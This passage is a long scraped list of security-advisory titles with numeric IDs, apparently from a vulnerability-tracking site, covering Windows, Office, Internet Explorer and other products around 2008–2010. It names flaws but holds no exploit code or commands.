Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024876] Windows Media Encoder May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024875] Windows Movie Maker May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024873] Windows OpenType Font Driver Memory Corruption Flaws Let Remote Users Execute Arbitrary Code [1024872] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Conduct Cross-Domain Attacks [1024790] Microsoft Outlook Attachment Processing Flaw Lets Remote Users Deny Service [1024787] Windows Kernel Buffer Overflow in RtlQueryRegistryValues() Lets Local Users Gain Elevated Privileges [1024707] Microsoft Forefront Unified Access Gateway Input Validation Flaws Permit Cross-Site Scripting and URL Redirection Attacks [1024706] Microsoft PowerPoint Bugs Let Remote Users Execute Arbitrary Code [1024705] Microsoft Office Flaws Let Remote Users Execute Arbitrary Code [1024676] Microsoft Internet Explorer Freed Object Invalid Flag Reference Access Lets Remote Users Execute Arbitrary Code [1024675] HP Insight Control Performance Management for Windows Lets Remote Users Download Arbitrary Files [1024673] HP Insight Recovery for Windows Flaws Permit Cross-Site Scripting and Directory Traversal Attacks [1024672] HP Insight Control Performance Management for Windows Flaws Permit Cross-Site Scripting and Cross-Site Request Forgery Attacks and Let Remote Authenticated Users Gain Elevated Privileges [1024667] HP Insight Managed System Setup Wizard for Windows Lets Remote Users Download Arbitrary Files [1024630] Microsoft Internet Explorer 'window.onerror' Callback Lets Remote Users Obtain Information From Other Domains [1024572] Sun Java System Directory Server Identity Synchronization for Windows Lets Local Users Access and Modify Data and Deny Service [1024559] Microsoft SharePoint Input Validation Hole in SafeHTML Permits Cross-Site Scripting Attacks [1024558] Microsoft Cluster Service Disk Permission Flaw Lets Local Users Gain Elevated Privileges [1024557] Microsoft Foundation Classes Library Buffer Overflow in Window Title Lets Remote Users Execute Arbitrary Code [1024556] Windows Schannel TLSv1 Processing Bug Lets Remote Users Deny Service [1024555] Windows Shell COM Object Instantiation Error Lets Remote Users Execute Arbitrary Code [1024554] Windows OpenType Font (OTF) Format Driver Memory Corruption Flaw Lets Local Users Gain Elevated Privileges [1024553] Windows LPC Buffer Overflow Lets Local Users Gain Elevated Privileges [1024552] Microsoft Office Excel Has Multiple Flaws That Let Remote Users Execute Arbitrary Code [1024551] Microsoft Office Word Processing Flaws Let Remote Users Execute Arbitrary Code [1024550] Windows Media Player Object Deallocation Error Lets Remote Users Execute Arbitrary Code [1024549] Windows Common Control Library Heap Overflow Lets Remote Users Execute Arbitrary Code [1024547] Windows win32k.sys Kernel-mode Driver Bugs Let Local Users Gain Elevated Privileges [1024546] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code, Obtain Information, and Conduct Cross-Site Scripting Attacks [1024545] Windows Media Player Use-After-Free Memory Error in Network Sharing Service Lets Remote Users Execute Arbitrary Code [1024544] Windows Embedded OpenType Font Engine Integer Overflow Lets Remote Users Execute Arbitrary Code [1024543] Microsoft .NET Framework JIT Compiler Memory Access Error Lets Remote Users Execute Arbitrary Code [1024537] Windows LPC Processing Flaw Lets Local Users Deny Service [1024496] Microsoft Internet Information Server (IIS) Web Server Stack Overflow in Reading POST Data Lets Remote Users Deny Service [1024459] Microsoft ASP.NET Padding Oracle Attack Lets Remote Users Decrypt Data [1024445] Microsoft Outlook Web Access Authentication Flaw Lets Remote Users Hijack User Sessions [1024444] Windows Client-Server Runtime Subsystem Lets Local Users Gain Elevated Privileges [1024443] Microsoft Local Security Authority Subsystem Service (LSASS) Heap Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1024442] Microsoft WordPad Parsing Error in Text Converters Lets Remote Users Execute Arbitrary Code [1024440] Microsoft Internet Information Services Bugs Let Remote Users Bypass Authentication, Deny Service, and Execute Arbitrary Code [1024439] Microsoft Outlook Heap Overflow Lets Remote Users Execute Arbitrary Code [1024438] Microsoft Office Unicode Font Parsing in USP10.DLL Lets Remote Users Execute Arbitrary Code [1024437] Windows Unicode Scripts Processor Font Parsing Error in USP10.DLL Lets Remote Users Execute Arbitrary Code [1024436] Windows MPEG-4 Codec Processing Flaw Lets Remote Users Execute Arbitrary Code [1024435] Windows Print Spooler Access Permission Flaw Lets Remote Users Execute Arbitrary Code [1024358] Windows TCP/IP Stack IcmpSendEcho2Ex() Bug Lets Local Users Deny Service [1024355] Windows Applications May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024345] Windows Kernel win32k!GreStretchBltInternal() Bug Lets Local Users Deny Service [1024320] Windows Telephony Application Programming Interfaces Lets Certain Local Users Gain Elevated Privileges [1024311] Windows TCP/IP Stack Lets Local Users Gain Elevated Privileges and Remote Users Deny Service [1024310] Microsoft Office Excel Flaw Lets Remote Users Execute Arbitrary Code [1024309] Windows Movie Maker Memory Corruption Error in Processing Project Files Lets Remote Users Execute Arbitrary Code [1024308] Windows Drivers Let Local Users Gain Elevated Privileges or Deny Service [1024307] Windows Kernel Bugs Let Local Users Gain Elevated Privileges and Deny Service [1024306] Microsoft Silverlight Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1024305] Microsoft .NET Framework Virtual Method Delegate Processing Error Lets Remote Users Execute Arbitrary Code [1024304] Microsoft Cinepak Codec Memory Pointer Error Lets Remote Users Execute Arbitary Code [1024303] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Conduct Cross-Domain Attacks [1024302] Microsoft MPEG Layer-3 Codecs Stack Overflow Lets Remote Users Execute Arbitary Code [1024301] Microsoft XML Core Services (MSXML) HTTP Response Processing Flaw Lets Remote Users Execute Arbitrary Code [1024300] Windows Schannel Certificate Validation Error Lets Remote Users Execute Arbitrary Code [1024299] Windows Schannel Protocol Flaw in SSL Renegotiation May Let Remote Users Conduct Man-in-the-Middle Attacks [1024298] Microsoft Office Word RTF, Word, and HTML Processing Errors Let Remote Users Execute Arbitrary Code [1024297] Windows SMB Server Flaws Let Remote Users Deny Service and Execute Arbitrary Code [1024277] Citrix XenApp Online Plug-in for Windows Flaw Lets Remote Users Execute Arbitrary Code [1024189] Microsoft Office Outlook Validation Error in Processing Attachments Lets Remote Users Execute Arbitrary Code [1024188] Microsoft Office Access ActiveX Controls Let Remote Users Execute Arbitrary Code [1024186] HP Insight Control Server Migration for Windows Lets Remote Users Conduct Cross-Site Request Forgery Attacks and Local Users Gain Unauthorized Access to Data [1024084] Microsoft Help and Support Center URL Escaping Flaw Lets Remote Users Execute Arbitrary Commands [1024080] Microsoft .NET XML Digital Signature Flaw May Let Remote Users Bypass Authentication [1024079] Microsoft Internet Information Services Memory Allocation Error Lets Remote Authenticated Users Execute Arbitrary Code [1024078] Microsoft SharePoint Input Validation Flaw in toStaticHTML API Permits Cross-Site Scripting Attacks [1024077] Microsoft SharePoint Help Page Processing Bug Lets Remote Users Deny Service [1024076] Microsoft Office Excel Has Multiple Flaws That Let Remote Users Execute Arbitrary Code [1024075] Microsoft Office Open XML File Format Converter for Mac Lets Local Users Gain Elevated Privileges [1024074] Windows OpenType Compact Font Format Memory Corruption Error Lets Local Users Gain Elevated Privileges [1024073] Microsoft Office COM Object Instantiation Error Lets Remote Users Execute Arbitrary Code [1024072] Windows Kernel 'win32k.sys' Lets Local Users Gain Elevated Privileges [1024070] Microsoft Internet Explorer 8 Developer Tools ActiveX Control Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1024069] Windows Media Decompression Components Let Remote Users Execute Arbitrary Code [1024068] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Conduct Cross-Site Scripting Attacks [1023991] Windows Memory Error in Canonical Display Driver Lets Remote Users Execute Arbitrary Code [1023982] HP Insight Control Server Migration for Windows Input Validation Flaw Permits Cross-Site Scripting Attacks [1023975] Microsoft Office Memory Corruption Error in VBE6.DLL Lets Remote Users Execute Arbitrary Code [1023974] Microsoft Visual Basic for Applications Memory Corruption Error in VBE6.DLL Lets Remote Users Execute Arbitrary Code [1023973] Windows Mail Integer Overflow in Processing POP3/IMAP Responses Lets Remote Users Execute Arbitrary Code [1023972] Microsoft Outlook Express Integer Overflow in Processing POP3/IMAP Responses Lets Remote Users Execute Arbitrary Code [1023939] Windows SMTP Service Uses Predictable Transaction IDs and Fails to Validate Response IDs Which May Permit DNS Spoofing [1023938] Microsoft Office Visio Buffer Overflow in Processing DXF Files Lets Remote Users Execute Arbitrary Code [1023932] Microsoft Office SharePoint Input Validation Flaw in 'help.aspx' Permits Cross-Site Scripting Attacks [1023913] HP Virtual Machine Manager for Windows Lets Remote Authenticated Users Gain Elevated Privileges [1023857] Windows IPv6 Stack ISATAP Tunnel Validation Flaw Lets Remote Users Spoof IPv4 Addresses [1023856] Microsoft Visio Index Calculation and Attribute Validation Flaws Let Remote Users Execute Code [1023855] Microsoft Exchange May Disclose Message Fragments to Remote Users [1023854] Microsoft Exchange Error in Parsing MX Records Lets Remote Users Deny Service [1023853] Microsoft Office Publisher TextBox Processing Buffer Overflow Lets Remote Users Execute Arbitrary Code [1023851] Windows Media Services Stack Overflow in Processing Transport Information Packets Lets Remote Users Execute Arbitrary Code [1023850] Windows Kernel Flaws Let Local Users Gain Elevated Privileges and Deny Service [1023849] Windows Media Player ActiveX Control Lets Remote Users Execute Arbitrary Code [1023848] Microsoft MPEG Layer-3 Codecs Stack Overflow Lets Remote Users Execute Arbitary Code [1023847] Windows Server Message Block Client Message Processing Bugs Let Remote Users Execute Arbitrary Code [1023846] Windows Authenticode Signature Verification Flaws Let Remote Users Execute Arbitrary Code [1023773] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Obtain Potentially Sensitive Information [1023720] Microsoft Virtual PC/Server Lets Local Users Gain Elevated Privileges [1023699] Microsoft Internet Explorer Invalid Pointer Reference Lets Remote Users Execute Arbitrary Code [1023698] Microsoft Office Excel Bugs Let Remote Users Execute Arbitrary Code [1023697] Windows Movie Maker Buffer Overflow Lets Remote Users Cause Arbitrary Code to Be Executed [1023668] Windows VBScript Script Engine Flaw in Processing Windows Help Files Lets Remote Users Execute Arbitrary Code [1023656] Windows API Bug Lets Local Users Deny Service [1023570] Windows Kernel Double Free Memory Error Lets Local Users Gain Elevated Privileges [1023569] Windows Client-Server Run-time Subsystem Process Termination Flaw Lets Local Users Gain Elevated Privileges [1023568] Windows SMB Server Flaws Lets Remote Authenticated Users Execute Arbitrary Code and Let Remote Users Deny Service [1023567] Microsoft Hyper-V Instruction Validation Bug Lets Local Users Deny Service [1023565] Microsoft Office Buffer Overflow in 'MSO.DLL' Lets Remote Users Execute Arbitrary Code [1023564] Microsoft Paint Integer Overflow Lets Remote Users Execute Arbitrary Code [1023563] Microsoft PowerPoint Buffer Overflows and Memory Errors Let Remote Users Execute Arbitrary Code [1023562] Microsoft DirectShow Heap Overflow Lets Remote Users Execute Arbitrary Code [1023561] Windows TCP/IP Stack IPv6 and Header Processing Bugs Let Remote Users Execute Arbitrary Code [1023560] Microsoft Internet Explorer Flaw in Microsoft Data Analyzer ActiveX Control Lets Remote Users Execute Arbitrary Code [1023559] Windows Server Message Block Client Validation and Race Condition Flaws Let Remote Users Execute Arbitrary Code [1023545] OpenSolaris Flaw in kclient and smbadm When Joining a Windows Domain Has Unspecified Impact [1023542] Microsoft Internet Explorer Discloses Known Files to Remote Users [1023494] Microsoft Internet Explorer Cross-Site Scripting Filter Can Be Bypassed [1023493] Microsoft Internet Explorer Multiple Memory Access Flaws Let Remote Users Execute Arbitrary Code [1023471] Windows Kernel #GP Trap Handler Flaw Lets Local Users Gain Elevated Privileges [1023462] Microsoft Internet Explorer Invalid Pointer Reference Lets Remote Users Execute Arbitrary Code [1023435] Adobe Flash 6 on Windows XP Has Multiple Flaws That Let Remote Users Execute Arbitrary Code [1023432] Microsoft Embedded OpenType Font Engine Integer Overflow Lets Remote Users Execute Arbitrary Code [1023387] Microsoft Internet Information Services (IIS) Filename Extension Parsing Configuration Error May Let Users Bypass Security Controls [1023302] Windows Media Player Indeo Codec Bugs Let Remote Users Execute Arbitrary Code [1023301] Microsoft Internet Explorer Indeo Codec Bugs Let Remote Users Execute Arbitrary Code [1023297] Microsoft Local Security Authority Subsystem Service Validation Flaw Lets Remote Users Deny Service [1023296] Microsoft Active Directory Federation Services Lets Remote Authenticated Users Execute Arbitrary Code and Spoof Web Sites [1023294] Microsoft Office Word and WordPad Text Converter Memory Errors Let Remote Users Execute Arbitrary Code [1023293] Microsoft Internet Explorer Memory Access Flaws Let Remote Users Execute Arbitrary Code [1023292] Microsoft Office Publisher Memory Allocation Validation Flaw Lets Remote Users Execute Arbitrary Code [1023291] Microsoft Internet Authentication Service Bugs Let Remote Authenticated Users Execute Arbitrary Code or Gain Privileges of the Target User [1023233] Microsoft Internet Explorer Discloses Local Path Names When Printing Local HTML Files to PDF Files [1023226] Microsoft Internet Explorer Invalid Pointer Reference in getElementsByTagName() Method Lets Remote Users Execute Arbitrary Code [1023179] Windows Kernel Flaw Lets Remote Users Deny Service [1023158] Microsoft Word Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1023157] Microsoft Excel Bugs Let Remote Users Execute Arbitrary Code [1023156] Microsoft Active Directory Stack Memory Consumption Flaw Lets Remote Users Deny Service [1023155] Windows Kernel 'Win32k.sys' Bugs Let Remote Users Execute Arbitrary Code and Local Users Gain Elevated Privileges [1023154] Microsoft License Logging Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1023153] Microsoft Web Services on Devices API (WSDAPI) Validation Error Lets Remote Users Execute Arbitrary Code [1023146] Tomcat Windows Installer Creates Default Blank Administrative Password [1023126] XScreenSaver May Allow Pop-up Windows to Bypass the Screen Saver When Accessibility is Enabled [1023013] Microsoft Crypto API NULL Character Flaw in Common Name Field and ASN.1 Integer Overflow Lets Remote Users Spoof Certficiates [1023012] Windows Media Player Heap Overflow in Processing ASF Files Lets Remote Users Execute Arbitrary Code [1023011] Microsoft Indexing Service ActiveX Control Lets Remote Users Execute Arbitrary Code [1023010] Microsoft Local Security Authority Subsystem Service (LSASS) Integer Underflow Lets Local Users Deny Service [1023009] Microsoft Silverlight Memory Modification Flaw Lets Remote Users Execute Arbitrary Code [1023008] Microsoft .NET Bugs Let Remote Users Execute Arbitrary Code [1023006] Microsoft GDI+ Overflows Let Remote Users Execute Arbitrary Code [1023005] Windows Media Format Runtime Flaws Let Remote Users Execute Arbitrary Code [1023004] Windows Server Message Block Validation Errors Let Remote Users Deny Service and Execute Arbitrary Code [1023003] Windows Kernel Lets Local Users Gain Elevated Privileges or Deny Service [1023002] Microsoft Internet Explorer Flaws Let Remote Users Execute Arbitrary Code [1022848] Windows Server Message Block NEGOTIATE PROTOCOL REQUEST Processing Flaw Lets Remote Users Execute Arbitrary Code [1022846] Microsoft Wireless LAN AutoConfig Service Heap Overflow Lets Remote Wireless Users Execute Arbitrary Code [1022845] Windows TCP/IP Stack Flaws Let Remote Users Execute Arbitrary Code and Deny Service [1022844] Windows Media Format Runtime Bugs in Processing ASF and MP3 Files Let Remote Users Execute Arbitrary Code [1022843] Microsoft DHTML Editing Component ActiveX Control Lets Remote Users Execute Arbitrary Code [1022842] Microsoft JScript Scripting Engine Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1022792] Microsoft Internet Information Server (IIS) FTP Server Buffer Overflows Let Remote Authenticated Users Execute Arbitrary Code and Deny Service [1022716] Microsoft Telnet NTLM Credential Reflection Flaw Lets Remote Users Gain Access [1022715] Microsoft ASP.NET Request Scheduling Flaw Lets Remote Users Deny Service [1022714] Windows Message Queuing Service (MSMQ) NULL Pointer Flaw Lets Local Users Gain Elevated Privileges [1022713] Windows Workstation Service Double Free Memory Error Lets Local Users Gain Elevated Privileges [1022712] Microsoft Active Template Library (ATL) Bugs Let Remote Users Execute Arbitrary Code [1022711] Windows Media File Processing Flaw in Handling AVI Files Lets Remote Users Execute Arbitrary Code [1022709] Windows Remote Desktop Connection Heap Overflows Let Remote Users Execute Arbitrary Code [1022708] Microsoft Office Web Components Buffer Overflows in ActiveX Control Let Remote Users Execute Arbitrary Code [1022630] Windows Kernel win32k.sys Lets Local Users Gain Elevated Privileges [1022611] Microsoft Internet Explorer Memory Corruption Bugs Let Remote Users Execute Arbitrary Code [1022610] Microsoft Visual Studio Active Template Library Bugs Let Remote Users Execute Arbitrary Code [1022547] Microsoft Internet Security and Acceleration Server OTP Authentication Bug Lets Remote Users Access Resources [1022546] Microsoft Office Publisher Pointer Dereference Bug Lets Remote Users Execute Arbitrary Code [1022545] Microsoft DirectX DirectShow Validation Bugs Let Remote Users Execute Arbitrary Code [1022544] Microsoft Virtual PC/Server Lets Local Users Gain Elevated Privileges Within a Guest Operating System [1022543] Windows Embedded OpenType (EOT) Font Engine Buffer Overflow Lets Remote Users Execute Arbitrary Code [1022535] Microsoft Office Web Components Bug in Spreadsheet ActiveX Control Lets Remote Users Execute Arbitrary Code [1022514] Microsoft DirectShow Buffer Overflow in ActiveX Control Lets Remote Users Execute Arbitrary Code [1022369] Microsoft PowerPoint Buffer Overflow in Freelance Translator Lets Remote Users Execute Arbitrary Code [1022359] Windows Kernel Bugs Let Local Users Gain Elevated Privileges [1022358] Microsoft Internet Information Services WebDAV Bug Lets Remote Users Bypass Authentication [1022357] Windows RPC Marshalling Engine Memory Error Lets Local Users Gain Elevated Privileges [1022356] Microsoft Word Buffer Overflows Let Remote USers Execute Arbitrary Code [1022355] Microsoft Office Works Document Converter Bug Lets Remote Users Execute Arbitrary Code [1022354] Microsoft Works Document Converter Bug Lets Remote Users Execute Arbitrary Code [1022353] Windows Search Lets Remote Users Execute Scripting Code to Obtain Information [1022352] Windows Print Spooler Lets Remote Users Execute Arbitrary Code and Local Users Read Arbitrary Files [1022351] Microsoft Excel Bugs Let Remote Users Execute Arbitrary Code [1022350] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1022349] Microsoft Active Directory Bugs Let Remote Users Execute Arbitrary Code or Deny Service [1022299] Microsoft DirectX Bug in DirectShow QuickTime Parser Lets Remote Users Execute Arbitrary Code [1022240] Microsoft Internet Information Server WebDAV Input Validation Flaw Lets Remote Users Execute Arbitrary Code [1022205] Microsoft PowerPoint Has Multiple Buffer Overflows and Memory Corruption Bugs That Let Remote Users Execute Arbitrary Code [1022046] Microsoft ISA Server Input Validation Flaw in 'cookieauth.dll' Permits Cross-Site Scripting Attacks [1022045] Microsoft ISA Server TCP State Error Lets Remote Users Deny Service [1022043] Microsoft WordPad and Office Text Converter Bugs Let Remote Users Execute Arbitrary Code [1022042] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1022041] Windows HTTP Services Bugs Let Remote Users Execute Arbitrary Code [1022040] Microsoft DirectX Bug in Decompressing DirectShow MJPEG Content Lets Remote Users Execute Arbitrary Code [1022039] Microsoft Excel Malformed Object Memory Corruption Bug Lets Remote Users Execute Arbitrary Code [1022009] XScreenSaver May Allow Pop-up Windows to Bypass the Screen Lock [1021976] VMware Windows 'vmci.sys' Driver Lets Local Users Gain Elevated Privileges [1021967] Microsoft Office PowerPoint Invalid Object Access Bug Lets Remote Users Execute Arbitrary Code [1021937] Windows Services for UNIX Unspecified Bugs in 'unlzh' and 'unpack' Let Users Execute Arbitrary Code [1021880] Microsoft Internet Explorer Unspecified Bug Lets Remote Users Execute Arbitrary Code [1021831] Microsoft DNS Server Bugs Let Remote Users Spoof the DNS Service [1021830] Microsoft DNS Server Registration Validation Flaw Lets Remote Users Conduct Spoofing Attacks [1021829] Microsoft WINS Server Registration Validation Flaw Lets Remote Users Conduct Spoofing Attacks [1021828] Windows SChannel TLS Handshake Authentication Flaw Lets Certain Remote Users Spoof the System [1021827] Windows Kernel Handle/Pointer Validation Bugs Let Local Users Gain System Privileges [1021826] Windows Kernel Input Validation Flaw Lets Remote Users Execute Arbitrary Code [1021820] IBM Tivoli Storage Manager HSM for Windows Buffer Overflow May Let Remote Users Execute Arbitrary Code [1021744] Microsoft Excel Invalid Object Access Flaw Lets Remote Users Execute Arbitrary Code [1021702] Microsoft Visio Bugs Let Remote Users Execute Arbitrary Code [1021701] Microsoft Exchange MAPI Command Literal Processing Bug Lets Remote Users Deny Service [1021700] Microsoft Exchange Memory Corruption Error in Decoding TNEF Data Lets Remote Users Execute Arbitrary Code [1021699] Microsoft Internet Explorer Bugs in Handling CSS Sheets and Deleted Objects Lets Remote Users Execute Arbitrary Code [1021621] QuickTime Input Validation Flaw in MPEG-2 Playback Component for Windows Lets Remote Users Execute Arbitrary Code [1021560] Windows Server Message Block Buffer Overflow Lets Remote Users Execute Arbitrary Code [1021495] Windows Media Player Integer Overflow in Playing WAV Files Lets Remote Users Deny Service [1021490] Microsoft SQL Server Heap Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1021381] Microsoft Internet Explorer DHTML Data Binding Invalid Pointer Reference Bug Lets Remote Users Execute Arbitrary Code [1021376] Microsoft WordPad Word 97 Text Converter Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1021375] Windows Media Services Discloses Authentication Information to Remote Users [1021374] Windows Media Player Discloses Authentication Information to Remote Users [1021373] Windows Media Player Service Principal Name NTLM Authentication Implementation Lets Remote Users Execute Arbitrary Code [1021372] Windows Media Services Service Principal Name NTLM Authentication Implementation Lets Remote Users Execute Arbitrary Code [1021371] Microsoft Internet Explorer HTML Processing Bugs Let Remote Users Execute Arbitrary Code [1021370] Microsoft Word Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1021368] Microsoft Excel Formula, Object, and Global Array Bugs Let Remote Users Execute Arbitrary Code [1021367] Microsoft Office SharePoint Server Access Control Flaw Lets Remote Users Gain Administrative Access [1021366] Windows Search Bugs Let Remote Users Execute Arbitrary Code [1021365] Microsoft GDI Buffer Overflows in Processing WMF Files Lets Remote Users Execute Arbitrary Code [1021363] Microsoft SQL Server Memory Overwrite Bug in sp_replwritetovarbin May Let Remote Users Execute Arbitrary Code [1021294] Microsoft Office Communicator VoIP Processing Bugs Let Remote Users Deny Service [1021245] Windows Vista Buffer Overflow in CreateIpForwardEntry2() May Let Local Users Gain Elevated Privileges [1021190] Mozilla Firefox '.url' Windows Shortcut Files May Let Remote Users Obtain Potentially Sensitive Information [1021164] Microsoft XML Core Services (MSXML) Bugs Let Remote Users Obtain Information and Execute Arbitrary Code [1021163] Windows Server Message Block NTLM Authentication Replay Bug Lets Remote Users Execute Arbitrary Code [1021091] Windows Server Service RPC Processing Bug Lets Remote Users Execute Arbitrary Code [1021090] Cisco PIX Firewall Windows NT Domain Authentication Bug Lets Remote Users Bypass IPSec/SSL VPN Authentication [1021089] Cisco ASA Windows NT Domain Authentication Bug Lets Remote Users Bypass IPSec/SSL VPN Authentication [1021053] Microsoft Ancillary Function Driver 'afd.sys' Lets Local Users Gain Elevated Privileges [1021052] Microsoft Message Queuing (MSMQ) Heap Overflow Lets Remote Users Execute Arbitrary Code [1021051] Windows Kernel Virtual Address Descriptor Integer Overflow Lets Local Users Gain Elevated Privileges [1021049] Windows Server Message Block Buffer Underflow Lets Remote Authenticated Users Execute Arbitrary Code [1021047] Microsoft Internet Explorer Flaws Permit Cross-Domain Scripting Attacks and Let Remote Users Execute Arbitrary Code [1021046] Windows Kernel Bugs Let Local Users Gain Elevated Privileges [1021045] Microsoft Office CDO Protocol Bug Lets Remote Users Execute Arbitrary Scripting Code [1021044] Microsoft Excel Object, Calendar, and Formula Bugs Let Remote Users Execute Arbitrary Code [1021043] Microsoft Host Integration Server RPC Buffer Overflow Lets Remote Users Execute Arbitrary Code [1021042] Microsoft Active Directory LDAP Memory Allocation Error Lets Remote Users Execute Arbitrary Code [1021020] Cisco Unity Bug in Microsoft API Lets Remote Users Deny Service [1021018] Microsoft Digital Image 'PipPPush.DLL' ActiveX Control Lets Remote Users Access Files [1020901] BIND Windows UDP Client Handler Bug Lets Remote Users Deny Service [1020887] Windows SMB Processing Bug Lets Remote Users Deny Service [1020845] Apple Bonjour for Windows mDNSResponder Null Pointer Dereference Lets Users Deny Service [1020844] Apple Bonjour for Windows DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020839] iTunes Windows Driver Integer Overflow Lets Local Users Gain Elevated Privileges [1020838] Microsoft GDI+ Integer Overflow in Processing BMP Files Lets Remote Users Execute Arbitrary Code [1020837] Microsoft GDI+ Buffer Overflow in Processing WMF Files Lets Remote Users Execute Arbitrary Code [1020836] Microsoft GDI+ Bug in Processing GIF Image Files Lets Remote Users Execute Arbitrary Code [1020835] Microsoft GDI+ Memory Corruption Error in Processing EMF Image Files Lets Remote Users Execute Arbitrary Code [1020834] Microsoft GDI+ Heap Overflow in Processing Gradient Sizes Lets Remote Users Execute Arbitrary Code [1020833] Microsoft Office OneNote Buffer Overflow Lets Remote Users Execute Arbitrary Code [1020832] Windows Media Encoder Buffer Overflow Lets Remote Users Execute Arbitrary Code [1020831] Windows Media Player Bug in Playing Audio Files via Server-side Playlists Lets Remote Users Execute Arbitrary Code [1020733] Windows Media Services ActiveX Control Buffer Overflow in CallHTMLHelp() Function Lets Remote Users Execute Arbitrary Code [1020711] Windows nslookup Bug May Let Remote Users Execute Arbitrary Code [1020699] VERITAS Storage Foundation for Windows Accepts NULL NTLMSSP Authentication [1020681] Windows Messenger ActiveX Control Bug Lets Remote Users Obtain Information and Perform Chat Functions [1020680] Windows Mail MTHML Redirect Bug Lets Remote Users Obtain Information [1020679] Microsoft Outlook Express MTHML Redirect Bug Lets Remote Users Obtain Information [1020676] Microsoft PowerPoint Memory Errors Let Remote Users Execute Arbitrary Code [1020675] Microsoft Color Management Module Heap Overflow Lets Remote Users Execute Arbitrary Code [1020674] Microsoft Internet Explorer Multiple Bugs Let Remote Users Execute Arbitrary Code [1020673] Microsoft Office Format Filter Bugs Let Remote Users Execute Arbitrary Code [1020672] Microsoft Excel Input Validation Bug in Parsing Records Lets Remote Users Execute Arbitrary Code [1020671] Microsoft Excel Input Validation Bug in Processing Array Index Values Lets Remote Users Execute Arbitrary Code [1020670] Microsoft Excel Input Validation Bug in Processing Index Values Lets Remote Users Execute Arbitrary Code [1020669] Microsoft Excel Credential Caching Bug Lets Local Users Gain Access to Remote Data Sources [1020607] Mac OS X Quick Look Buffer Overflow in Downloading Microsoft Office Files Lets Remote Users Execute Arbitrary Code [1020447] Microsoft Word Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1020441] Microsoft SQL Server Bugs Let Remote Authenticated Users Obtain Information and Execute Arbitrary Code [1020439] Microsoft Outlook Web Access for Exchange Server Input Validation Bugs Permit Cross-Site Scripting Attacks [1020437] Windows DNS Service Bugs Let Remote Users Spoof the System [1020436] Windows Explorer Bug in Parsing Saved Search Files Lets Remote Users Execute Arbitrary Code [1020433] Microsoft Access Snapshot Viewer ActiveX Control Lets Remote Users Download Files to Arbitrary Locations [1020382] Microsoft Internet Explorer Lets Remote Users Conduct Cross-Domain Scripting Attacks [1020330] Safari for Windows WebKit JavaScript Array Memory Corrpution Bug Lets Remote Users Execute Arbitrary Code [1020329] Safari for Windows Bug with IE Trusted Zone Sites Lets Remote Users Execute Arbitrary Code [1020232] Microsoft Speech API Lets Remote Users Execute Arbitrary Commands [1020231] Windows Bug in Processing Pragmatic General Multicast Packets with an Invalid Fragment Option Lets Remote Users Deny Service [1020230] Windows Bug in Processing Pragmatic General Multicast Packets with an Invalid Option Length Lets Remote Users Deny Service [1020229] Microsoft Active Directory LDAP Validation Bug Lets Remote Users Deny Service [1020228] Microsoft WINS Data Structure Validation Bug Lets Local Users Gain Elevated Privileges [1020226] Microsoft Internet Explorer HTTP Request Header Bug May Let Remote Users Obtain Information in a Different Domain [1020225] Microsoft Internet Explorer Bug in Processing Method Calls Lets Remote Users Execute Arbitrary Code [1020223] Microsoft DirectX SAMI File Validation Bug Lets Remote Users Execute Arbitrary Code [1020222] Microsoft DirectX MJPEG Stream Error Handling Bug Lets Remote Users Execute Arbitrary Code [1020221] Windows Bluetooth Stack SDP Processing Bug Lets Remote Users Execute Arbitrary Code [1020197] VMware Tools Input Validation Flaw in Windows Guest OS Lets Local Users Gain Elevated Privileges [1020150] Apple Safari for Windows XP and Vista Lets Remote Users Download Files [1020016] Microsoft Malware Protection Engine Lets Remote Users Deny Service [1020015] Microsoft Publisher Bug in Processing Object Header Data Lets Remote Users Execute Arbitrary Code [1020014] Microsoft Word Memory Error in Processing CSS Values Lets Remote Users Execute Arbitrary Code [1020013] Microsoft Word Memory Error in Processing RTF Files Lets Remote Users Execute Arbitrary Code [1020007] Windows CE GDI+ and GIF Processing Bug Lets Remote Users Execute Arbitrary Code [1019904] Windows Kernel Bug Lets Local Users Gain LocalSystem Privileges [1019804] Microsoft Visio Lets Remote Users Execute Arbitrary Code [1019803] Windows Kernel Lets Local Users Gain Kernel Level Privileges [1019802] Windows DNS Client Lets Remote Users Spoof the System [1019801] Microsoft Internet Explorer Data Stream Processing Bug Lets Remote Users Execute Arbitrary Code [1019800] Microsoft Internet Explorer 'hxvz.dll' ActiveX Control Lets Remote Users Execute Arbitrary Code [1019799] Windows VBScript and JScript Scripting Engine Bug Lets Remote Users Execute Arbitrary Code [1019798] Microsoft GDI Buffer Overflow in Processing EMF and WMF Files Lets Remote Users Execute Arbitrary Code [1019797] Microsoft Project Memory Error Lets Remote Users Execute Arbitrary Code [1019738] Microsoft Office S/MIME Processing Lets Remote Users Access Arbitrary URLs [1019737] Windows Live Mail S/MIME Processing Lets Remote Users Access Arbitrary URLs [1019736] Microsoft Outlook S/MIME Processing Lets Remote Users Access Arbitrary URLs [1019686] Microsoft Jet Database Buffer Overflow in 'msjet40.dll' Lets Remote Users Execute Arbitrary Code via Word Documents [1019621] VMware Windows Hosted Systems Named Pipe Bugs Let Local Users Gain Elevated Privileges [1019616] GroupWise Windows Client API Bug Lets Remote Authenticated Users Access E-mail [1019605] Citrix Presentation Server Client for Windows May Disclose Credentials to Local Users [1019587] Microsoft 